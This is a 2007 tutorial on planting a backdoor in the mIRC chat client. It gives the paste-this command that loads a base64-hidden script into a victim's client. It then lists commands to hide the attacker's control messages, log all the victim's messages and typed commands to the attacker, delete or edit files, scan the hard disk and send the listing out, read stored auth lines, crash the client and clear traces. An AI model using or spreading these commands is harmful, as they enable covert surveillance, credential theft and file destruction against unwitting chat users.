Tutorial mIRC Remote Access Script
Thursday, June 21st, 2007Tutorial mIRC Remote Access Script
Infect the victim
The script can be activated by the remote PC when he writes the next command:
//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg YOURNICK i love you
YOURNICK = your nick. The remote computer will message you “I love you” once he writes the command. You can edit it or just delete the “ | msg YOURNICK I love you ” part.
This is what the command does: it will make a new .mrc file czm and put this in it (which is encoded in the command): on ^*:text:ins*:?:{ . $+ $2- | haltdef }
The haltdef will block your messages to the remote PC beginning with “ins”. With this the user can’t see your commands, so he wont have a clue who is controlling his mIRC.
Example:
/msg victim ins msg #channel hi
This will let the victim message #channel the “hi” message, but the remote PC will NOT see it, all others in the channel will see. And the victim will not see your message “ins msg #channel hi” because it will be blocked by “haltdef”. Nice isn’t it? If this has a bot application in this way the bot doesn’t get all the garbage data that it doesn’t need.
When the victim has executed that command the remote script is active. You can add a spy function if you want (this can cause him an excess flood if he is on too much “popular” channels (channel with much activity). For adding the spy part (it will send you all his activity, messages received, message sent and commands executed) execute the next commands:
Spy the remote PC (e.g. logging the activities for bots)
/msg victim ins write -c myscript.mrc
/msg victim ins unload -rs myscript.mrc
/msg victim insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg victim ins write myscript.mrc on *:TEXT:*:*: { .msg YOURNICK $timestamp <- $1- }
/msg victim ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,,[COMMAND]) $1- }
/msg victim ins load -rs myscript.mrc
Once done that, you’ll receive the msgs immediately. You can let the spy function stop by typing the next command:
/msg victim ins unload -rs myscript.mrc
Note: victim = the nick of the victim who has executed that command, and who has the Trojan.
Sometimes you want to partly spy the remote PC, by example only read the private messages. Not the messages from the channels he is in, with this you will have less chance that he will flood himself of the server (excess flood). So the spy script becomes:
/msg victim ins write -c myscript.mrc
/msg victim ins unload -rs myscript.mrc
/msg victim insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg victim ins write myscript.mrc on *:TEXT:*:?: { .msg YOURNICK $timestamp <- $1- }
/msg victim ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,,[COMMAND]) $1- }
/msg victim ins load -rs myscript.mrc
YOURNICK is your nick, and victim is the nick of the victim.
Make other remote files (.mrc)
You can make remote files yourself and add usefull functions in it.
/msg victim insert write -c YOURSCRIPTNAME.mrc on 1:TEXT:*!opme*:#CHANNEL:/mode #channel +o $nick
/msg victim ins .load –rs YOURSCRIPTNAMEt.mrc
Use of the Trojan
REMOVE FILE :
/msg victim ins remove C:\Textfile.txt
OPEN SITE:
/msg victim ins url www.site.com
JOIN CHANNEL:
/msg victim ins join #channel
PART CHANNEL:
/msg victim ins part #channel
QUERY USER:
/msg victim ins query user
MSG USER:
/msg victim ins msg user
INVITE USER:
/msg victim ins invite user #channel
BAN USER:
/msg victim ins ban #channel user
KICK USER:
/msg victim ins kick #channel user
IGNORE USER:
/msg victim ins ignore *!*@host.com
UNIGNORE USER:
/msg victim ins unignore *!*@host.com
CHANGE NICK:
/msg victim ins nick thenickyouwant
OP USER:
/msg victim ins mode #channel +o user
VOICE USER:
/msg victim ins mode #channel +v user
CHANGE TOPIC:
/msg victim ins topic #channel text
RECEIVE FILE:
/msg victim ins dcc send user file
or
/msg victim ins dcc send user C:\something.sth
EDIT TEXT:
/msg victim ins write -l1 C:\TESTING.txt thetextyouwanttoedit
(-l1 –> first line)
READ A PIECE OF FILE (LIKE PERFORM):
following commands must be executed after eachother:
/msg victim ins write mab alias abcd123 { msg user $read(perform.ini,w,*auth*) }
/msg victim ins .load -rs mab
/msg victim ins abcd123
SEARCH HARD DISK FOR A FILE:
/msg victim ins write MAB1 alias MAB1 { .echo $findfile(C:\,porn.*,0,msg user $1-) }
/msg victim ins .load -rs MAB1
/msg victim ins MAB1
LET HIS mIRC CRASH:
/msg victim ins write MAB2 alias MAB2 { while (1 != 2) { beep } }
/msg victim ins .load -rs MAB2
/msg victim ins MAB2
SCAN HIS HARD DISK AND SAVE IT AS .txt:
//echo $findfile(c:,*.*,0,write C:\M_A_B.txt $1-)
Note: Probably you want this file, well you do this:
/msg victim ins dcc send YOURNICK C:\M_A_B.txt
** Important note **
The victim will see the send dialog, so act quick, for security reasons i suggest to write another trojan on another file; like:
/msg victim write MyNewScript.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs MyNewScript.mrc
TURN THE AUTO JOIN ON INVITE ON (or OFF)
/msg victim ins ajinvite on
LET THE VICTIM MESSAGE SOMETHING ON ALL THE CHANNELS HE IS ON:
/msg victim ins amsg
CHANGE THE VICTIMs ALTERNATIVE NICK:
/msg victim ins anick
CHANGE THE VICTIMs BACKGROUND PICTURE:
/msg victim ins background [-aemsgdluhcfnrtpx] [window] [filename]
with
-a = active window
-m = main mIRC window
-s = status window
-g = finger window
-d = single message window
-e = set as default
-cfnrtp = center, fill, normal, stretch, tile, photo
-l = toolbar
-u = toolbar buttons
-h = switchbar
-x = no background picture
LET THE “mIRC CHANNEL CENTRAL” OF A CHANNEL POP UP:
/msg victim ins channel #CHANNELNAME
Note: the victim must be on #CHANNELNAME
CLEAR YOUR TRACKS BY CLEARING THE TEXT ON THE OPEN WINDOWS:
/msg victim ins clearall [-snqmtgu]
s = status, n = channel, q = query, m = message window, t = chat, g = finger, u = custom.
LET THE VICTIM CLIPBOARD A SPECIFIED TEXT:
/msg victim ins clipboard
CLOSE THE OPEN QUERIES OF THE VICTIM:
/msg victim ins close
LET THE VICTIM QUIT mIRC:
/msg victim ins quit
LET THE VICTIM DISCONNECT FROM SERVER:
/msg victim ins disconnect
LET THE VICTIM CHANGE SERVER:
/msg victim ins server the.server.you.want
LET THE VICTIM OPEN A NEW SERVER NEXT TO THE SERVER HE IS ALREADY IN:
/msg victim ins server -m
/msg victim ins server the.server.you.want
LET THE VICTIM GIVE YOU FLAGS (if he is able to):
/msg victim ins msg |TheBot| chanlev #channel YOURNICK +flag
Note:
|TheBot| = the bot who can give flags
Chanlev = can be different, sometimes it is also, “adduser”
flag = the flag you want
YOURNICK = your nick
CHANGE THE VICTIMs FONT AND FONT SIZE:
/msg victim ins font -asgbd
CHANGE THE VICTIMs FULL NAME:
/msg victim ins fullname
LET THE VICTIM REJOIN A CHANNEL:
/msg victim ins hop #CHANNEL
MAKE A NEW DIRECTORY ON THE VICITMs HARD DISK:
/msg victim ins mkdir
NOTE:
victim = nick of the victim
user = your nick
copied and pasted @ http://users.pandora.be/ahmadi/index.htm
